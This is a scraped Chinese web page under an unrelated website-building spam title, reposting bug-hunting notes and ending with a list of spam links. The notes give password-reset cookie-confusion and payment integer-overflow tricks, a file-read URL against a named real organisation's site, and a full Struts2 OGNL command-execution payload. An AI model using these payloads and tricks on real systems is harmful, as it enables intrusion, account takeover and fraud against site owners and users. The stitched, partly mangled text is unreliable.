当前位置: 首页 > news >正文

长沙营销型网站建设制作马云做黄页网站时候

长沙营销型网站建设制作,马云做黄页网站时候,wordpress怎么修改字体颜色,wordpress+3d线条本文转载于https://blog.csdn.net/qq_33942040/article/details/111831536 这三类存在漏洞可能更大 越他娘丑的站#xff0c;越有可能存在洞。 Asp aspx 存在漏洞的可能更大 登陆口没得验证码的可能存在一,未授权访问 常见28种服务器或者中间协议未授权访问 易出现处 ①照片…本文转载于https://blog.csdn.net/qq_33942040/article/details/111831536 这三类存在漏洞可能更大 越他娘丑的站越有可能存在洞。 Asp aspx 存在漏洞的可能更大 登陆口没得验证码的可能存在一,未授权访问 常见28种服务器或者中间协议未授权访问 易出现处 ①照片访问类代目录类处 如乌云实例 在http://learn.open.com.cn/登入 首页-详细信息-查看 查看照片地址 发现目录泄露了 http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/ ② …/ 、 WEB-INF 、 jsp$jsp结尾)类的文件读取类典型过滤该类内容即可实现过滤类 如 ③审计元素代改包内容 二,逻辑漏洞 二具二可 可多开,考虑多开逻辑。 具多量,考虑空逻辑与覆盖逻辑或者替换逻辑 具数字,考虑溢出逻辑 可签到类–可考虑并发逻辑 #业务逻辑漏洞 常规思路 ①值返回到页面中类型--有点像泄露逻辑 ②根据返回包判断可否的逻辑 #骚思路逻辑 ①并发逻辑--启用一个直接并发同时打开好多个 ②覆盖逻辑--典型cookie覆盖逻辑 ③校验逻辑--典型未校验-- 1.)如签约即可购买低价会员类逻辑,如果支付宝和微信均可,可以多开尝试是否校验校验解约后再次签约的情况 2.)是否校验重复打开签约的情况(多开同开绕过) 3.)空校验逻辑绕过④溢出逻辑(因为溢出后会从零开始算导致)-- 正数溢出--即变量大于int类的数据导致如单价为2,要正数溢出--可以1073741825个*2即大于2147483647 负数溢出--即典型负负得正的操作八种厂商的逻辑漏洞挖掘思路 ①cookie混淆–两个同时进行找回密码 利用原理–同一个浏览器中同时找回两个账户的密码即一个浏览器找回不同密码时,两个账号的cookie相同导致的 验证码与cookie绑定而两账号此时cookie相同造成了混淆,造成cookie混淆,进而实现越权更改密码 实际例子–乌云1905后台重置密码处 注册个账号分析下数据包感觉闻到了cookie混淆的味道 使用我的账号进行正常找回密码流程获取验证码停留在输入验证码页面 这时在同一浏览器打开新的网页用被害账号test进行正常找回流程停止输入手机验证码页面 然后在我的账号的新密码页面输入新密码 提交后收到200返回包重置成功test的密码被重置了 这里是因为验证码与cookie绑定而两账号此时cookie相同造成了混淆 ②cookie处返回了加密的验证码 如 ③返回密码的邮箱在前端处 如案例 即改为自己的邮箱即可获取到相应的验证码 三,任意文件下载 典型以downloadFile文件结尾或者其他内容结尾的内容 典型案列 #如中国证券协会 http://person.sac.net.cn/pages/sacinfo/downloadFile.action?inputPathWEB-INF%2Fweb.xmlfileNamestudentFlow.pdf四,任意文件删除 原因网站支持input delete等多余协议导致 乌云案例 即支持PUT DELETE协议导致后台任意文件删除 五,命令执行漏洞 ①支持命令执行类 如下 支持shell命令 执行后即可输入命令的返回值状况 ②cve或者struts2漏洞执行等漏洞 利用方式 利用漏洞利用工具直接执行即可 struts2漏洞典型手动利用代码 redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}典型cve 1.)CVE-2014-0160 心脏滴血漏洞 2.反序列化漏洞 原理一个序列化的对象转换为字节的时候,代码审核不严格导致的命令执行漏洞 jboss反序列化教程 java rmi反序列化漏洞–典型1099端口 六.其余专题 文件泄露专题 xxe漏洞专题 ssrf漏洞专题 任意文件读取专题 getshell专题 iframe劫持专题 URL重定向专题 xss专题 web特殊漏洞专题 路径端口工具专题 表达式注入–即由于表达式引起的命令执行漏洞 典型即框架接受参数后可执行命令导致 表达式注入
http://www.zqtcl.cn/news/147564/

相关文章:

  • 苏州网站公司排名前十最好看的视频免费下载
  • 快速设计一个网站wordpress4.9.6
  • 网站建立教学深圳宝安网站建设公司推荐
  • 深圳企业网站建设制作公司叶县红色家园网站建设
  • 网站制作报价被哪些因素影响建设银行官方网站首页个人登录
  • 免费网站怎么建谁能给个网站谢谢
  • 吴忠网站建设家里面的服务器可以做网站吗
  • 这是我自己做的网站做网站前台要学什么课程
  • 程序网站开发建设隔离变压器移动网站
  • 网站设置不发送消息怎么设置回来用typecho做的网站
  • 网站机房建设嵌入式培训机构哪家好
  • 购物网站页面设计图片网站 签约
  • 上海网站改版方案网站邮件设置
  • 如何在自己网站添加链接高端品牌logo图片
  • 网站建设找c宋南南app软件设计
  • 龙岗网站推广seo 0xu
  • 成都做网站微网站后台录入
  • 开发区网站建设山东房地产新闻
  • 手机如何搭建网站网站菜单导航
  • 网站建设丿金手指专业社交投票论坛网站开发
  • 做一套网站开发多少钱设计高端的国外网站
  • 有没有网站做lol网站的网页设计实验报告书
  • 网站后台域名重庆好的seo平台
  • 文化建设设计公司网站跨境电商亚马逊
  • 建设企业网站官网下载中心游戏网站开发设计报告
  • 外贸网站导航栏建设技巧专做奢侈品品牌的网站
  • 网站开发工程师资格证网站建设代理都有哪些
  • 汕头网站建设技术托管wordpress faq
  • 外贸网站建设系统能联系做仿瓷的网站
  • 阿里云网站域名绑定做网站的需要哪些职位